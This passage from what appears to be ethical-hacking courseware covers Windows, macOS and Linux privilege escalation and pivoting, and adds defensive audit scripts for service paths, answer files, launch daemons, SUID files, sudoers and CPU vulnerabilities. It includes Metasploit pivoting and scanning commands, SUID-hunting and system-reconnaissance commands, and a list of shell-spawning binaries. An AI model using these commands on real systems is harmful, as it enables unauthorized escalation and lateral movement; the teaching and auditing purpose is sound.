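The search just described can be run in reverse as an audit: for each service ImagePath, list the executables Windows would try before the intended one. The C program below is an added example (it is not from the courseware or from PowerSploit) that does this for a constructed set of ImagePath values; each prefix that ends at a space, with ".exe" appended, is a location where a writable directory would let a foreign binary run as the service account.

```c
/* Added example, not from the courseware or PowerSploit: audit a service
 * ImagePath for the unquoted-path problem and list the shadow executables
 * Windows would try first. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define PATH_MAX_LEN 260
#define MAX_CANDIDATES 8

/* Returns the number of shadow locations (0 = quoted or no spaces, nothing to
 * fix; -1 = path too long). Up to max_out of them are written to out. */
int unquoted_path_candidates(const char *image_path, char out[][PATH_MAX_LEN], int max_out) {
    if (image_path[0] == '"') return 0;            /* quoted: the SCM does not guess */
    size_t len = strlen(image_path);
    if (len + 5 > PATH_MAX_LEN) return -1;
    /* The binary ends at the first ".exe"; anything after that is arguments. */
    size_t end = len;
    for (size_t i = 0; i + 4 <= len; i++) {
        if (image_path[i] == '.' &&
            tolower((unsigned char)image_path[i + 1]) == 'e' &&
            tolower((unsigned char)image_path[i + 2]) == 'x' &&
            tolower((unsigned char)image_path[i + 3]) == 'e') {
            end = i + 4;
            break;
        }
    }
    int n = 0;
    for (size_t i = 0; i < end; i++) {
        if (image_path[i] != ' ') continue;
        if (n < max_out) {
            memcpy(out[n], image_path, i);       /* prefix up to the space */
            memcpy(out[n] + i, ".exe", 5);       /* plus extension and NUL */
        }
        n++;
    }
    return n;
}

/* Constructed sample of ImagePath values as stored under
 * HKLM\SYSTEM\CurrentControlSet\Services\<name>. */
static const char *const sample_image_paths[] = {
    "\"C:\\Program Files\\Good Vendor\\agent.exe\" -service",
    "C:\\Windows\\system32\\svchost.exe -k netsvcs",
    "C:\\Program Files\\Vuln Svc\\service.exe -k start",
};

/* Returns how many sample services have an exploitable unquoted path. */
int count_risky_sample_paths(void) {
    int risky = 0;
    size_t count = sizeof sample_image_paths / sizeof sample_image_paths[0];
    for (size_t i = 0; i < count; i++)
        if (unquoted_path_candidates(sample_image_paths[i], NULL, 0) > 0)
            risky++;
    return risky;
}

int main(void) {
    char cands[MAX_CANDIDATES][PATH_MAX_LEN];
    size_t count = sizeof sample_image_paths / sizeof sample_image_paths[0];
    for (size_t i = 0; i < count; i++) {
        int n = unquoted_path_candidates(sample_image_paths[i], cands, MAX_CANDIDATES);
        printf("%s\n  -> %d shadow path(s)\n", sample_image_paths[i], n);
        for (int j = 0; j < n && j < MAX_CANDIDATES; j++)
            printf("     %s\n", cands[j]);
    }
    return 0;
}
```

For the third sample path the output lists C:\Program.exe and C:\Program Files\Vuln.exe. The fix is to quote the path in the service definition (for example sc config <service> binPath= "\"C:\Program Files\Vuln Svc\service.exe\" -k start") and to make sure standard users cannot write to C:\ or to C:\Program Files.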

• Service Object Permissions

A misconfigured service permission may allow an attacker to modify or reconfigure the attributes associated with that service. This may even lead to changing the location of the application binary to a malicious executable created by the attacker. By exploiting such services, attackers can even add new users to the local administrator group in the system. Attackers then hijack the new account to elevate their access privileges.

Figure 6.85: Screenshot of Metasploit showing execution of PowerSploit to detect misconfigured service permission

• Unattended Installs

Unattended installs allow attackers to deploy Windows OSs without the intervention of an administrator. Administrators need to manually clean up the unattended install details stored in the Unattend.xml file. This file stores all the configuration settings set during the installation process and may also include sensitive information such as the configuration of local accounts, usernames, and even decoded passwords.

In Windows systems, the Unattend.xml file is stored in one of the following locations:

c:\Windows\Panther\
c:\Windows\Panther\Unattend\
c:\Windows\system32\
C:\Windows\system32\sysprep\

If attackers can gain access to this file, then they can easily obtain credential information and configuration settings used during the installation of that service or application. Attackers use this information to escalate privileges.

Figure 6.86: Screenshot of Metasploit showing execution of PowerSploit to detect unattended install
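An administrator cleaning up after an unattended install needs to know whether a leftover answer file still carries credentials. The C program below is an added example (not from the courseware or PowerSploit) that counts the <Password> elements in an Unattend.xml document and how many of them are declared <PlainText>true</PlainText>; the remainder are base64-encoded, which is an encoding rather than a protection. The XML document is constructed.

```c
/* Added example, not from the courseware or PowerSploit: scan an Unattend.xml
 * document for <Password> elements so leftover answer files can be found and
 * removed from the locations listed above. */
#include <stdio.h>
#include <string.h>

/* Returns the number of <Password> elements; *plaintext (if not NULL) receives
 * how many of them carry <PlainText>true</PlainText>. */
int count_unattend_passwords(const char *xml, int *plaintext) {
    int found = 0, pt = 0;
    const char *p = xml;
    while ((p = strstr(p, "<Password>")) != NULL) {
        const char *end = strstr(p, "</Password>");
        if (end == NULL) break;                       /* malformed tail: stop */
        const char *flag = strstr(p, "<PlainText>true</PlainText>");
        if (flag != NULL && flag < end) pt++;
        found++;
        p = end + strlen("</Password>");
    }
    if (plaintext) *plaintext = pt;
    return found;
}

/* Constructed sample resembling the AutoLogon and LocalAccount sections;
 * the values are placeholders, not real credentials. */
static const char sample_unattend[] =
    "<unattend>"
    " <AutoLogon>"
    "  <Password><Value>UABhAHMAcwB3AG8AcgBkAA==</Value><PlainText>false</PlainText></Password>"
    "  <Enabled>true</Enabled><Username>Administrator</Username>"
    " </AutoLogon>"
    " <LocalAccounts><LocalAccount>"
    "  <Password><Value>Summer2020!</Value><PlainText>true</PlainText></Password>"
    "  <Name>svc_deploy</Name><Group>Administrators</Group>"
    " </LocalAccount></LocalAccounts>"
    "</unattend>";

/* Convenience for the constructed sample: returns the plaintext count. */
int sample_plaintext_passwords(void) {
    int pt = 0;
    count_unattend_passwords(sample_unattend, &pt);
    return pt;
}

int main(void) {
    int pt = 0;
    int total = count_unattend_passwords(sample_unattend, &pt);
    printf("%d password element(s): %d plain text, %d base64-encoded\n",
           total, pt, total - pt);
    return 0;
}
```

On a real host the document would be read from each of the four paths listed above; any file that yields a non-zero count should be deleted, and the accounts it names should have their passwords rotated, since base64 offers no more protection than plain text.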

Pivoting and Relaying to Hack External Machines

Pivoting and relaying are the techniques used to find detailed information about the target network. These techniques are performed after successfully compromising a target system. The compromised system is used to penetrate the target network to access other systems and resources that are otherwise inaccessible from the attacking network.

In the pivoting technique, only the systems accessible through the compromised systems are exploited, whereas in the relaying technique, the resources accessible through the compromised system are explored or accessed. Using pivoting, attackers can open a remote shell on the target system tunneled through the initial shell on the compromised system. In relaying, resources present on the other systems are accessed through a tunneled shell session on the compromised system.

The following diagrams illustrate the pivoting and relaying techniques:

Figure 6.87: Illustration of pivoting

Figure 6.88: Illustration of relaying

Detailed explanation of the pivoting and relaying techniques is as follows:

Pivoting

In this technique, the first objective of an attacker is to compromise a system to gain a remote shell on it, and further bypass the firewall to pivot through the compromised system and gain access to the other vulnerable systems in the network. Once the system is successfully compromised, a Meterpreter session is established. As the session is pivoted through the compromised system, the target system cannot determine the actual origin of the exploitation.

Steps to perform pivoting:

1. Discover live hosts in the network

Once a system is compromised, an ARP scan is performed to discover the list of live systems in the network. For example, an attacker uses the following command to detect live hosts in the target network:

> run post/windows/gather/arp_scanner RHOSTS=<target subnet range>

Figure 6.89: Screenshot of Metasploit showing results of arp_scanner

As shown in the screenshot, the scan results show seven IP addresses reachable from the compromised system. To find out more information about these IP addresses, attackers perform port scanning.

2. Set up routing rules

Prior to using Metasploit to run a port scanner against two IP addresses in the target network, attackers implement routing rules to instruct Metasploit to route all the traffic destined to the private network using the existing Meterpreter session established between the attacker's system and the compromised system. For example, an attacker can use the following commands to perform this step:

> background
> route add <IP address> <subnet mask> <session number>

Routing rule to instruct Metasploit to route any traffic destined to 10.10.10.0 255.255.255.0 to session number 1 (Meterpreter session established with a compromised system)

Figure 6.90: Screenshot of Metasploit setting up routing rule

3. Scan ports of live systems

Once the routing rule is implemented, port scanning is performed against the live systems. For example, the attacker uses the following commands to perform port scanning on the target systems:

> use auxiliary/scanner/portscan/tcp
> set RHOSTS <IP addresses>
> set PORTS 1-1000
> run

As shown in the screenshot, the result displays the open ports on the private systems.

Figure 6.91: Screenshot of Metasploit showing results of port scan

4. Exploit vulnerable services

After the ports are scanned, the vulnerable services running on those ports can be exploited. For example, an attacker can use the BypassUAC exploit to bypass the User Access Control (UAC) setting. As shown in the screenshot, a successful session is established to the vulnerable system by pivoting through a compromised system.

Figure 6.92: Accessing the target system
Relaying

If the pivoting technique is unsuccessful, attackers use the relaying technique to exploit a vulnerable system in the target network. Attackers use relaying to access resources present on other systems in the target network via the compromised system in such a way that the requests to access the resources come from the initially compromised system.

Steps to perform relaying:

1. Set up port forwarding rules

The main purpose of port forwarding is to allow a user to reach a specific port on a system that is not present on the same network. The initially compromised system is responsible for allowing direct access to the system, which is otherwise inaccessible from the attacking system.

Using a Meterpreter session, a listener can be created using a port number from a list of open ports on the localhost, which links that listener to a port on a remote server. This linking of ports is known as port forwarding. For example, here, the attacker chose port numbers 80, 22, and 445 to set up port forwarding rules.

Figure 6.93: Applying port forwarding rules
2. Access the system resources

Once port forwarding has been successful, an attacker can use an appropriate client program to access the remote resources present on the target system. For example:

Attackers can browse an HTTP server running on the target system by using the following URL:

http://localhost:10080

Attackers can access an SSH server running on the target system by executing the following command:

# ssh myadmin@localhost
Other Privilege Escalation Techniques

• Access Token Manipulation

In Windows OSs, access tokens are used to determine the security context of a process or thread. These tokens include the access profile (identity and privileges) of a user associated with a process. After a user is authenticated, the system produces an access token. Every process the user executes makes use of this access token. The system verifies this access token when a process is accessing a secured object.

Any Windows user can modify these access tokens so that the process appears to belong to some other user than the one who started it. Then, the process acquires the security context of the new token. For example, Windows administrators have to log on as normal users and need to run their tools with admin privileges using the token manipulation command "runas." Attackers can exploit this to access the tokens of other users, or generate spoofed tokens, to escalate privileges and perform malicious activities while evading detection.

• Application Shimming

The Windows OSs use a Windows Application Compatibility Framework called shims to provide compatibility between the older and newer versions of Windows. For example, application shimming allows programs created for Windows XP to be compatible with Windows 10. Shims provide a buffer between the program and the OS. This buffer is referenced when a program is executed to verify whether the program requires access to the shim database. When a program needs to communicate with the OS, the shim database uses API hooking to redirect the code. All the shims installed by the default Windows installer (sdbinst.exe) are stored at:

%WINDIR%\AppPatch\sysmain.sdb
hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb

Shims run in user mode, and they cannot modify the kernel. Some of these shims can be used to bypass UAC (RedirectEXE), inject malicious DLLs (InjectDLL), capture memory addresses (GetProcAddress), etc. An attacker can use these shims to perform different attacks including disabling Windows Defender, privilege escalation, installing backdoors, etc.
• Filesystem Permissions Weakness

Many processes in the Windows OSs execute binaries automatically as part of their functionality or to perform certain actions. If the filesystem permissions of these binaries are not set properly, then the target binary file may be replaced with a malicious file, and the actual process can execute it. If the process that is executing this binary has higher-level permissions, then the binary also executes under higher-level permissions, which may include SYSTEM. Attackers can exploit this technique to replace original binaries with malicious binaries to escalate privileges. Attackers use this technique to manipulate Windows service binaries and self-extracting installers.
Path Interception
Path interception is a method of placing an executable in a particular path in such a way that the application will execute it in place of the legitimate target. Attackers can exploit several flaws or misconfigurations to perform path interception like unquoted paths (service paths and shortcut paths), path environment variable misconfiguration, and search order hijacking. Path interception helps an attacker to maintain persistence on a system and escalate privileges.
Scheduled Task
The Windows OS includes utilities such as 'at' and 'schtasks.' A user with administrator privileges can use these utilities in conjunction with the Task Scheduler to schedule programs or scripts that can be executed at a particular date and time. If a user provides proper authentication, he/she can also schedule a task from a remote system using a remote procedure call (RPC). An attacker can use this technique to execute malicious programs at system startup, maintain persistence, perform remote execution, escalate privileges, etc.
Launch Daemon
During the MacOS and OS X booting process, launchd is executed to complete the system initialization process. Parameters for each launch-on-demand system-level daemon found in /System/Library/LaunchDaemons and /Library/LaunchDaemons are loaded using launchd. These daemons have property list files (plist) that are linked to executables that run at the time of booting. Attackers can create and install a new launch daemon, which can be configured to execute at boot-up time using launchd or launchctl to load plist into the relevant directories. The weak configurations allow an attacker to alter the existing launch daemon's executable to maintain persistence or to escalate privileges.
Plist Modification
In MacOS and OS X, plist (property list) files include all the necessary information that is needed to configure applications and services. These files describe when programs should execute, the executable file path, program parameters, essential OS permissions, etc. The plist files are stored at specific locations like /Library/Preferences (which execute with high-level privileges) and ~/Library/Preferences (which execute with user privileges). Attackers can access and alter these plist files to execute malicious code on behalf of a legitimate user, and further use them as a persistence mechanism and to escalate privileges.
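The following is an added example, not code from the courseware: a defender-side audit of a LaunchDaemons directory for the weak configuration the Launch Daemon and Plist Modification sections describe. Because launchd runs these daemons as root, a plist, or the program it points to, that a non-root user can write lets that user decide what runs at boot. The script assumes a POSIX shell with find and awk; the fixture tree, the label names and the plist contents are constructed for the demonstration, and on a real host you would pass /Library/LaunchDaemons instead.

```shell
#!/bin/sh
# Added example (not from the CEH courseware): audit launchd daemon plists for
# group- or world-writable plists and programs. Paths below are a constructed fixture.

# Print the program a plist launches: the first <string> inside ProgramArguments.
program_path() {
    awk '/<key>ProgramArguments<\/key>/ { grab = 1; next }
         grab && match($0, /<string>[^<]*<\/string>/) {
             print substr($0, RSTART + 8, RLENGTH - 17); exit
         }' "$1"
}

# True when the file is group- or world-writable (mode bit 020 or 002 set).
writable_by_others() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]
}

# Report findings for every plist in directory $1, one per line:
#   writable-plist <plist>
#   writable-program <program> <plist>
#   missing-program <program> <plist>   (launchd would run whatever appears there later)
audit_launch_daemons() {
    for plist in "$1"/*.plist; do
        [ -f "$plist" ] || continue
        if writable_by_others "$plist"; then
            printf 'writable-plist %s\n' "$plist"
        fi
        prog=$(program_path "$plist")
        if [ -z "$prog" ]; then
            continue
        elif [ ! -e "$prog" ]; then
            printf 'missing-program %s %s\n' "$prog" "$plist"
        elif writable_by_others "$prog"; then
            printf 'writable-program %s %s\n' "$prog" "$plist"
        fi
    done
}

# Write a minimal launchd plist into directory $1 with label $2 launching program $3.
write_plist() {
    cat > "$1/$2.plist" <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>$2</string>
    <key>ProgramArguments</key>
    <array><string>$3</string><string>--daemon</string></array>
    <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
}

# Constructed fixture: one sound daemon, one whose plist is world-writable, one whose
# program is world-writable, and one whose program no longer exists.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/LaunchDaemons" "$root/usr/local/bin"
    : > "$root/usr/local/bin/agent";  chmod 0755 "$root/usr/local/bin/agent"
    : > "$root/usr/local/bin/helper"; chmod 0777 "$root/usr/local/bin/helper"
    write_plist "$root/LaunchDaemons" com.example.good  "$root/usr/local/bin/agent"
    write_plist "$root/LaunchDaemons" com.example.loose "$root/usr/local/bin/agent"
    write_plist "$root/LaunchDaemons" com.example.weak  "$root/usr/local/bin/helper"
    write_plist "$root/LaunchDaemons" com.example.gone  "$root/usr/local/bin/removed"
    chmod 0644 "$root"/LaunchDaemons/*.plist
    chmod 0666 "$root/LaunchDaemons/com.example.loose.plist"
    printf '%s\n' "$root"
}

# Stand-alone demo: build the fixture and print the findings.
demo() {
    root=$(make_fixture)
    audit_launch_daemons "$root/LaunchDaemons"
    rm -rf "$root"
}
demo
```

The check deliberately stops at permission bits and the existence of the program; ownership by root and code signing are further conditions a production audit would add, and the "missing-program" case is reported because the directory that would hold the program may itself be writable.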
Setuid and Setgid
In Linux and MacOS, if an application uses setuid or setgid, the application will execute with the privileges of the owning user or group, respectively. Generally, the applications run under the current user's privileges. There are certain circumstances where the programs must be executed with elevated privileges but the user running the program does not need the elevated privileges. In this scenario, one can set the setuid or setgid flags for their applications. An attacker can exploit the applications with the setuid or setgid flags to execute malicious code with elevated privileges.
Web Shell
A web shell is a web-based script that allows access to a web server. Web shells can be created in all OSs like Windows, Linux, MacOS, and OS X. Attackers create web shells to inject a malicious script on a web server to maintain persistent access and escalate privileges. Attackers use a web shell as a backdoor to gain access and control a remote server. Generally, a web shell runs under the current user's privileges. Using a web shell, an attacker can perform privilege escalation by exploiting local system vulnerabilities. After escalating privileges, an attacker can install malicious software, change user permissions, add or remove users, steal credentials, read emails, etc.


Abusing Sudo Rights
Sudo (substitute user do) is a UNIX- and Linux-based system utility that permits users to run commands as a superuser or root by using the security privileges of another user. An /etc/sudoers file includes the configuration of sudo rights. This file contains detailed information regarding access permissions, including commands that are allowed to run with or without passwords per user or group. Attackers can abuse sudo to escalate their privileges to run programs that the normal users are not allowed to run. For example, if an attacker has sudo rights to run a cp command, then he/she can overwrite an /etc/sudoers or /etc/shadow file with his/her own malicious file. By overwriting the content of the sudoers file, he/she can edit the permissions to run various restricted commands or programs to launch further attacks on the system.

Abusing SUID and SGID Permissions
Set User Identification (SUID) and Set Group Identification (SGID) are access permissions given to a program file in UNIX-based systems. These permissions usually allow the users on the system to run a program with temporarily elevated privileges or root privileges to execute a particular task. The files with SUID and SGID rights run with higher privileges.
In Linux, there are some commands and binaries that can be executed by the attackers to elevate their privileges from non-root users to root users, if flags of SUID and SGID rights are set. Some of the executable commands that can be used by attackers to spawn a shell and escalate privileges are Nmap, vim, less, more, Bash, Cat, cp, echo, find, Nano, etc.
Attackers can use the following commands to find SUID and SGID files in the target system:
# Find SUID
find / -perm -u=s -type f 2>/dev/null
# Find SGID
find / -perm -g=s -type f 2>/dev/null
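The same find expressions serve the defender, as the following added example shows (it is not code from the courseware). A new SUID or SGID file that was absent from yesterday's inventory is one of the clearest indicators of the abuse described above, so the script records a baseline and reports only what appeared since. It assumes a POSIX shell with find, sort and comm; the directory tree, file names and modes created by make_fixture are constructed, and on a real host the root to scan would be /.

```shell
#!/bin/sh
# Added example (not from the CEH courseware): baseline SUID/SGID files and report
# additions. The tree built by make_fixture is constructed test data.

# List regular files under $1 carrying the setuid (4000) or setgid (2000) bit.
# Same test as the page's -u=s / -g=s forms; sorted in the C locale so comm can diff.
list_suid_sgid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | LC_ALL=C sort
}

# Record the current list in the baseline file $2.
save_baseline() {
    list_suid_sgid "$1" > "$2"
}

# Print SUID/SGID files present now but absent from baseline $2 (empty when none).
new_since_baseline() {
    list_suid_sgid "$1" | LC_ALL=C comm -13 "$2" -
}

# Constructed fixture: two expected privileged binaries and one ordinary file.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/tmp"
    : > "$root/usr/bin/passwd"; chmod 4755 "$root/usr/bin/passwd"
    : > "$root/usr/bin/wall";   chmod 2755 "$root/usr/bin/wall"
    : > "$root/usr/bin/ls";     chmod 0755 "$root/usr/bin/ls"
    printf '%s\n' "$root"
}

# Add one more setuid file after the baseline was taken, as a detector test case.
plant_suid() {
    : > "$1/tmp/.cache"; chmod 4755 "$1/tmp/.cache"
}

# Stand-alone demo: baseline, then detect the file added afterwards.
demo() {
    root=$(make_fixture)
    save_baseline "$root" "$root/baseline.txt"
    plant_suid "$root"
    echo "New SUID/SGID files since baseline:"
    new_since_baseline "$root" "$root/baseline.txt"
    rm -rf "$root"
}
demo
```

Run save_baseline once on a known-good build and new_since_baseline from a scheduled job; an empty result is the expected state, and any path it prints deserves the same review the text gives to Nmap, vim, find and the other shell-spawning binaries.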
Kernel Exploit
Kernel exploits refer to programs that can exploit vulnerabilities present in the kernel to execute arbitrary commands or code with higher privileges. By successfully exploiting kernel vulnerabilities, attackers can attain superuser or root-level access to the target system. To run a kernel exploit, attackers must have configuration details of the target system.
Attackers use the following commands to obtain details such as the OS, kernel version, and architecture of the target system:
# OS
cat /etc/issue
# Kernel version
# Architecture
cat /proc/version
Attackers search https://www.exploit-db.com and execute Python scripts such as linprivchecker.py to detect kernel exploits for escalating privileges.

Privilege Escalation Tools
Privilege escalation tools such as BeRoot, linpostexp, Windows Exploit Suggester, etc. allow attackers to run a configuration assessment on a target system to find information about the underlying vulnerabilities, services, file and directory permissions, kernel version, architecture, etc. Using this information, attackers can further find a way to exploit and elevate their privileges on the target system.
▪ BeRoot
Source: https://github.com
BeRoot is a post-exploitation tool to check common misconfigurations to find a way to escalate privilege.
As shown in the screenshot, using this tool, attackers can obtain information about service permissions, writeable directories with their locations, permissions on startup keys, etc.

Figure 6.94: Screenshot of BeRoot showing service permissions
Figure 6.95: Screenshot of BeRoot showing Startup keys and Task scheduler permissions
▪ linpostexp
Source: https://github.com
The linpostexp tool obtains detailed information on the kernel, which can be used to escalate privileges on the target system.
As shown in the screenshot, using this tool, attackers can obtain information about the kernel, file systems, superuser, sudoers, sudo version, etc. Attackers can use this information to exploit vulnerabilities present in the kernel to elevate their privileges.
The following command is used to extract this information about the target system:
python linprivchecker.py
Figure 6.97: Screenshot of linpostexp showing user, filesystem, and environmental info

How to DefendAgainst PrivilegeEscalation


The best countermeasure against privilege escalation is to ensure that users have the lowest possible privileges still adequate to use their system effectively. In this case, even if an attacker succeeds in gaining access to the low-privileged account, he/she will not be able to gain administrative-level access. Often, flaws in programming code allow such escalation of privileges on a target system. As stated earlier, an attacker can gain access to the network using a non-administrative account and then gain the higher privilege of an administrator.
The following are the best countermeasures to defend against privilege escalation:
▪ Restrict interactive logon privileges

▪ Run users and applications with the lowest privileges
▪ Implement multi-factor authentication and authorization
▪ Run services as unprivileged accounts
▪ Implement a privilege separation methodology to limit the scope of programming errors and bugs
▪ Use an encryption technique to protect sensitive data
▪ Reduce the amount of code that runs with a particular privilege
▪ Perform debugging using bounds checkers and stress tests
▪ Test the system thoroughly for application coding errors and bugs
▪ Regularly patch and update the kernel
▪ Change UAC settings to "Always Notify," so that it increases the visibility of the user when UAC elevation is requested
▪ Restrict users from writing files to the search paths for applications
▪ Continuously monitor file system permissions using auditing tools
▪ Reduce the privileges of user accounts and groups so that only legitimate administrators can make service changes
▪ Use whitelisting tools to identify and block malicious software that changes file, directory, or service permissions
▪ Use fully qualified paths in all Windows applications
▪ Ensure that all executables are placed in write-protected directories
▪ In Mac OSs, prevent plist files from being altered by users by making them read-only
▪ Block unwanted system utilities or software that may be used to schedule tasks
▪ Regularly patch and update the web servers
▪ Disable the default local administrator account
▪ Detect, repair, and fix any flaws or errors running in the system services

Defend against abusing sudo rights:
▪ Implement a strong password policy for sudo users
▪ Turn off password caching by setting the timestamp_timeout to 0, so that every time sudo is executed users must input their password
▪ Separate sudo-level administrative accounts from the administrator's regular accounts, to prevent stealing of sensitive passwords
▪ Update user permissions and accounts at regular intervals
▪ Test sudo users with access to programs containing parameters for arbitrary code execution
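The following is an added example, not code from the courseware, that puts two of these sudo countermeasures and the earlier "Abusing Sudo Rights" section into a single check: it reads a sudoers file and reports NOPASSWD rules that grant one of the file-copying or shell-spawning commands the text names, and it shows whether the password cache (timestamp_timeout) has been turned off. It assumes a POSIX shell with sed and awk; the sudoers content written by write_sample_sudoers is constructed for the demonstration, and on a real host you would point the functions at /etc/sudoers and the files under /etc/sudoers.d.

```shell
#!/bin/sh
# Added example (not from the CEH courseware): audit sudoers for risky NOPASSWD rules
# and for a password cache that was never disabled. Sample sudoers content is constructed.

# Commands the page lists as able to overwrite files or spawn a shell under sudo,
# plus ALL, which grants everything.
RISKY_CMDS='ALL|cp|vim|vi|less|more|bash|sh|cat|echo|find|nano|nmap'

# Drop comments and blank lines and join "\" continuation lines, so each rule is one line.
normalize_sudoers() {
    sed -e 's/#.*$//' -e '/^[[:space:]]*$/d' "$1" | sed -e ':a' -e '/\\$/N; s/\\\n//; ta'
}

# Print "user command" for every NOPASSWD entry whose command basename is risky.
find_nopasswd_risky() {
    normalize_sudoers "$1" | grep 'NOPASSWD:' |
    awk -v re="(^|/)(${RISKY_CMDS})( |\$)" '
        {
            split($0, parts, "NOPASSWD:")
            n = split(parts[2], cmds, ",")
            for (i = 1; i <= n; i++) {
                gsub(/^[ \t]+|[ \t]+$/, "", cmds[i])
                if (cmds[i] ~ re) print $1, cmds[i]
            }
        }'
}

# Print the effective password-cache lifetime in minutes: the last
# "Defaults timestamp_timeout=N" if present, else sudo's upstream default of 5.
# The hardening the text recommends is 0 (prompt on every sudo).
timestamp_timeout() {
    val=$(normalize_sudoers "$1" |
          sed -n 's/^Defaults.*timestamp_timeout[ ]*=[ ]*\(-*[0-9][0-9]*\).*/\1/p' | tail -n 1)
    printf '%s\n' "${val:-5}"
}

# Constructed sample: one acceptable NOPASSWD rule, two risky ones, cache left at 15 min.
write_sample_sudoers() {
    cat > "$1" <<'EOF'
# constructed sample sudoers, not from any real host
Defaults        env_reset
Defaults        timestamp_timeout=15
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(root) NOPASSWD: /bin/cp, /usr/bin/systemctl restart app
ops     ALL=(ALL) NOPASSWD: /usr/bin/vim, \
                            /usr/bin/less
EOF
}

# Stand-alone demo on the constructed sample.
demo() {
    f=$(mktemp)
    write_sample_sudoers "$f"
    echo "password cache lifetime (minutes): $(timestamp_timeout "$f")"
    echo "NOPASSWD rules on risky commands:"
    find_nopasswd_risky "$f"
    rm -f "$f"
}
demo
```

The deploy rule is the case the text describes: a passwordless cp is enough to overwrite /etc/sudoers or /etc/shadow, so it is reported even though the second command on the same line is harmless. Appending "Defaults timestamp_timeout=0" makes timestamp_timeout report 0, which is the setting the countermeasure above calls for.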

Tools for Defending against DLL and Dylib Hijacking
Cybersecurity professionals can use tools such as Dependency Walker, DLLHijackAuditKit, and DLLSpy to detect and prevent privilege escalation using DLL hijacking. In addition, tools such as Dylib Hijack Scanner help security professionals to detect and prevent privilege escalation using Dylib hijacking on OS X systems. These tools help security professionals to monitor system files in the systems for modifying, moving, renaming, or replacing DLLs or dylibs.

▪ Dependency Walker
Source: http://www.dependencywalker.com
Dependency Walker is useful for troubleshooting system errors related to loading and executing modules. It detects many common application problems, such as missing modules, invalid modules, import/export mismatches, circular dependency errors, etc.
As shown in the screenshot, cybersecurity professionals use Dependency Walker to verify all the DLLs used by an application, the location from which DLLs are loaded, missing DLLs, etc. This information helps security professionals to detect, patch, and fix misconfigured DLLs in the systems.
Figure 6.98: Screenshot of Dependency Walker

▪ Dylib Hijack Scanner
Source: https://objective-see.com
Dylib Hijack Scanner (DHS) is a simple utility that will scan your computer for applications that are either susceptible to dylib hijacking or have been hijacked.
As shown in the screenshot, security professionals use DHS to detect applications that have been hijacked or are vulnerable to dylib hijacking. This information helps them to patch and fix these applications.
Figure 6.99: Screenshot of Dylib Hijack Scanner

Defending against Spectre and Meltdown Vulnerabilities
Various countermeasures to defend against privilege escalation attacks that exploit Spectre and Meltdown vulnerabilities are as follows:
▪ Regularly patch and update OSs, firmware, and applications
▪ Enable continuous monitoring of critical services and applications running on the system and network
▪ Regularly patch vulnerable software such as browsers
▪ Install and update ad-blockers and anti-malware software to block injection of malware through compromised websites
▪ Enable traditional protection measures such as endpoint security tools to prevent unauthorized system access
▪ Block services and applications that allow unprivileged users to execute code
▪ Never install unauthorized software or access untrusted websites from systems storing sensitive information
▪ Use data loss prevention (DLP) solutions to prevent leakage of critical information from runtime memory
▪ Frequently check with the manufacturer for BIOS updates and follow the instructions provided by the manufacturer to install the updates

Tools for Detecting Spectre and Meltdown Vulnerabilities
Security professionals can use tools such as InSpectre, Spectre & Meltdown Checker, INTEL-SA-00075 Detection and Mitigation Tool, etc. to detect Spectre and Meltdown vulnerabilities that exist in the system hardware. Detection of these vulnerabilities before exploitation helps security professionals to install the necessary OS and firmware patches to defend against such exploitation.
▪ InSpectre
Source: https://www.grc.com
InSpectre examines and discloses any Windows system's hardware and software capability to prevent Meltdown and Spectre attacks. Detecting these vulnerabilities at an early stage helps security professionals to update system hardware, its BIOS, which reloads the updated processor firmware, and its OS to use the new processor features.

Figure 6.100: Screenshot of InSpectre showing Spectre and Meltdown vulnerabilities
▪ Spectre & Meltdown Checker
Source: https://github.com
Spectre & Meltdown Checker is a shell script to determine whether a system is vulnerable against various "speculative execution" CVEs. For Linux systems, the script will detect mitigations, including backported non-vanilla patches, regardless of the advertised kernel version number or the distribution (such as Debian, Ubuntu, CentOS, RHEL, Fedora, openSUSE, Arch, etc.).
As shown in the screenshot, security professionals use Spectre & Meltdown Checker to determine whether the system is immune to speculative execution vulnerabilities. This tool helps them in verifying whether the system has the known correct mitigations in place.
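A lighter-weight check that complements the tool above, given here as an added example that is neither courseware code nor part of the Spectre & Meltdown Checker project: the Linux kernel publishes its own verdict on each speculative-execution issue as one file per issue under /sys/devices/system/cpu/vulnerabilities/, and these functions turn that into a short report. The directory is a parameter so the same code runs against the constructed fixture below and against a live host; the status strings written by make_fixture mirror the kernel's wording but are constructed test data, not output from any particular machine.

```shell
#!/bin/sh
# Added example (not from the CEH courseware): summarize the kernel's sysfs
# speculative-execution status files. Fixture contents are constructed.

# Print "<issue> <status>" per file in the directory, classifying the kernel's wording:
# "Not affected" -> not-affected, "Mitigation: ..." -> mitigated, "Vulnerable..." -> vulnerable.
summarize_cpu_vulns() {
    dir=${1:-/sys/devices/system/cpu/vulnerabilities}
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        text=$(cat "$f" 2>/dev/null)
        case "$text" in
            "Not affected"*) status=not-affected ;;
            Mitigation:*)    status=mitigated ;;
            Vulnerable*)     status=vulnerable ;;
            *)               status=unknown ;;
        esac
        printf '%s %s\n' "$(basename "$f")" "$status"
    done
}

# Print how many issues the kernel still reports as vulnerable.
count_vulnerable() {
    summarize_cpu_vulns "$1" | grep -c ' vulnerable$' || true
}

# Succeed only when nothing is reported vulnerable or unclassified.
is_fully_mitigated() {
    [ "$(summarize_cpu_vulns "$1" | grep -c -e ' vulnerable$' -e ' unknown$')" -eq 0 ]
}

# Constructed fixture: four issue files with representative kernel phrasing.
make_fixture() {
    d=$(mktemp -d)
    printf 'Mitigation: PTI\n' > "$d/meltdown"
    printf 'Mitigation: usercopy/swapgs barriers and __user pointer sanitization\n' > "$d/spectre_v1"
    printf 'Vulnerable\n' > "$d/spectre_v2"
    printf 'Not affected\n' > "$d/l1tf"
    printf '%s\n' "$d"
}

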